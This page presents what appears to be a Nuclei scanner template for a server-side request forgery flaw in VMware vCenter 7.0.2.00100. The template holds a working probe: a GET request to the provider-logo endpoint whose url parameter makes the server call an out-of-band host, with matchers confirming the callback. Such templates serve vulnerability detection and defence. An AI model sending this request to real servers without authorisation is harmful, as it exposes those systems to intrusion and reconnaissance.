vmware-vcenter-ssrf: VMware vCenter - Server-Side Request Forgery/Local File Inclusion/Cross-Site Scripting

2025-08-01 VMware vCenter PoC Public

Description

VMware vCenter 7.0.2.00100 is susceptible to multiple vulnerabilities including server-side request forgery, local file inclusion, and cross-site scripting.

PoC

id: vmware-vcenter-ssrf

info:
  name: VMware vCenter - Server-Side Request Forgery/Local File Inclusion/Cross-Site Scripting
  author: pdteam
  severity: critical
  description: VMware vCenter 7.0.2.00100 is susceptible to multiple vulnerabilities including server-side request forgery, local file inclusion, and cross-site scripting.
  reference:
    - https://github.com/l0ggg/VMware_vCenter
  classification:
    cwe-id: CWE-918
  metadata:
    max-request: 1
  tags: ssrf,lfi,xss,oast,vcenter,vmware,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 4b0a00483046022100c56d815aeb646639dcc18c086e3717fd817067c56000df3e756cebe49055004f022100860a462773173999314232ef9d4a50c2cedb8f5b49c6f86742de44506c5d43bf:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities